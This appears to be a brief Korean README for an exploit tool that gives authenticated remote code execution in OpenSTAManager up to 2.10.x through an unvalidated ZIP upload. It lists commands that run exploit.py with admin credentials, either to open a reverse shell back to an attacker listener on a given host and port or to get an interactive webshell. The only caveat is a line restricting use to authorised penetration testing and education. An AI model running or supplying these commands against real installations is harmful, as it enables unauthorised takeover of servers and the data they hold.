
모듈 업데이트 엔드포인트에서 검증되지 않은 ZIP 업로드를 통한 인증된 RCE.
영향받는 버전: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
공인된 침투 테스트 및 교육 목적으로만 사용하십시오.